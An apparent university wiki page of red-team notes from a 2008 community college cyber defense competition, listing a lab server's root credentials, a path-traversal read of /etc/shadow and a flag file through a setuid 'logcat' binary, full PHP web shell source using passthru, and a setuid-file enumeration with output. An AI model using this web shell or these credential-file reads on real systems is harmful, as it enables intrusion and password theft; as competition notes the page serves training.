C3DCF08 Webserver information

From Information Assurance Center Wiki

Jump to: navigation, search

2008 Community College CDC Red

Copy of webserver: 49.10.100.100; root/toor

Created regular user: blah/blah

Notable attacks

on webservers: login as cdc

logcat ../../etc/shadow

logcat ../www/8_web.flag.gpg > out

mv out public_html/

flag available at <www>/~cdc/out

shell.php code

<?php

$register_globals = (bool) ini_get('register_gobals');

if ($register_globals) $svr = getenv(SERVER_NAME);

else $svr = $_SERVER['SERVER_NAME'];

?>

<html>

<head>

<title>Published at scripts.tropicalpcsolutions.com</title>

</head>

<body>

<form enctype="multipart/form-data" method="POST">

<br>

[webshell@<?php echo $svr ?> /]#

  <input type="text" name="cmd" value="">

  <input type="submit" value="Enter">

</form>

<br>

<hr width="75%" align="left">

<br>

</body>

</html>

<?php

$cmd = $_POST['cmd']; if($cmd) {

passthru($cmd,$last_line);

echo '<pre>'; echo $last_line;  echo '

';

}

?> </pre>

setuid files

find / -type f \( -perm -04000 -o -perm -02000 \) \-exec ls -lg {} \; 
-rwxr-sr-x 3 mail 9812 2008-11-18 17:05 /usr/bin/mail-lock
-rwxr-sr-x 1 mlocate 30260 2008-11-18 17:05 /usr/bin/mlocate
-rwxr-sr-x 3 mail 9812 2008-11-18 17:05 /usr/bin/mail-unlock
-rwxr-sr-x 1 utmp 336452 2008-11-18 17:05 /usr/bin/screen
-rwsr-xr-x 1 root 32028 2008-11-18 17:05 /usr/bin/chfn
-rwsr-sr-x 1 root 9236 2008-11-18 17:05 /usr/bin/sudoku
-rwsr-xr-x 1 root 32988 2008-11-18 17:05 /usr/bin/passwd
-rwsr-sr-x 1 mail 72316 2008-11-18 17:05 /usr/bin/procmail
-rwsr-xr-x 1 root 47908 2008-11-18 17:05 /usr/bin/mtr
-rwsr-xr-x 1 root 26728 2008-11-18 17:05 /usr/bin/newgrp
-rwxr-sr-x 1 ssh 79860 2008-11-18 17:05 /usr/bin/ssh-agent
-rwxr-sr-x 1 shadow 18472 2008-11-18 17:05 /usr/bin/expiry
-rwsr-xr-x 1 root 27548 2008-11-18 17:05 /usr/bin/chsh
-rwsr-xr-x 2 root 115136 2008-11-18 17:05 /usr/bin/sudoedit
-rwsr-sr-x 1 root 9240 2008-11-18 17:05 /usr/bin/logcat
-rwsr-xr-x 1 root 11048 2008-11-18 17:05 /usr/bin/arping
-rwxr-sr-x 1 tty 8192 2008-11-18 17:05 /usr/bin/bsd-write
-rwxr-sr-x 1 mail 12832 2008-11-18 17:05 /usr/bin/lockfile
-rwsr-xr-x 1 root 12296 2008-11-18 17:05 /usr/bin/traceroute6.iputils
-rwsr-sr-x 1 daemon 43172 2008-11-18 17:05 /usr/bin/at
-rwxr-sr-x 1 shadow 49276 2008-11-18 17:05 /usr/bin/chage
-rwxr-sr-x 1 crontab 31632 2008-11-18 17:05 /usr/bin/crontab
-rwsr-xr-x 2 root 115136 2008-11-18 17:05 /usr/bin/sudo
-rwxr-sr-x 1 tty 13808 2008-11-18 17:05 /usr/bin/wall
-rwxr-sr-x 3 mail 9812 2008-11-18 17:05 /usr/bin/mail-touchlock
-rwxr-sr-x 1 mail 14200 2008-11-18 17:05 /usr/bin/dotlockfile
-rwsr-sr-x 1 root 786176 2008-11-18 17:05 /usr/bin/nmap
-rwsr-xr-x 1 root 45468 2008-11-18 17:05 /usr/bin/gpasswd
-rwsr-sr-x 1 root 9241 2008-11-18 17:05 /usr/bin/logtail   -- tried ..
-rwsr-xr-x 1 root 5492 2008-10-02 16:58 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root 183156 2008-10-13 13:50 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root 9620 2008-09-29 05:40 /usr/lib/pt_chown
-rwxr-sr-x 1 smmsp 68436 2008-05-20 02:21 /usr/lib/sm.bin/mailstats
-rwxr-sr-x 1 smmsp 824600 2008-05-20 02:21 /usr/lib/sm.bin/sendmail
-rwsr-xr-- 1 dip 273064 2008-10-15 20:51 /usr/sbin/pppd
-rwsr-xr-x 1 root 9460 2008-05-20 02:21 /usr/sbin/sensible-mda
-rwsr-sr-x 1 libuuid 13796 2008-10-13 08:09 /usr/sbin/uuidd
find: `/proc/5130/task/5130/fd/5': No such file or directory
find: `/proc/5130/task/5130/fdinfo/5': No such file or directory
find: `/proc/5130/fd/5': No such file or directory
find: `/proc/5130/fdinfo/5': No such file or directory
-rwsr-xr-x 1 root 22064 2008-09-25 11:06 /bin/fusermount
-rwsr-xr-x 1 root 92584 2008-09-25 08:08 /bin/mount
-rwsr-xr-x 1 root 26684 2007-12-10 11:33 /bin/ping6
-rwsr-xr-x 1 root 31012 2008-06-09 13:10 /bin/su
-rwsr-xr-x 1 root 71556 2008-09-25 08:08 /bin/umount
-rwsr-xr-x 1 root 30856 2007-12-10 11:33 /bin/ping
-rwsr-xr-- 1 messagebus 42740 2008-10-07 09:23 /lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root 26540 2008-10-10 09:12 /sbin/mount.cifs
-rwxr-sr-x 1 shadow 30272 2008-10-15 23:36 /sbin/unix_chkpwd
-rwsr-xr-x 1 root 9836 2008-11-18 17:05 /sbin/umount.cifs
Personal tools
Namespaces
Variants
Actions
Navigation
Toolbox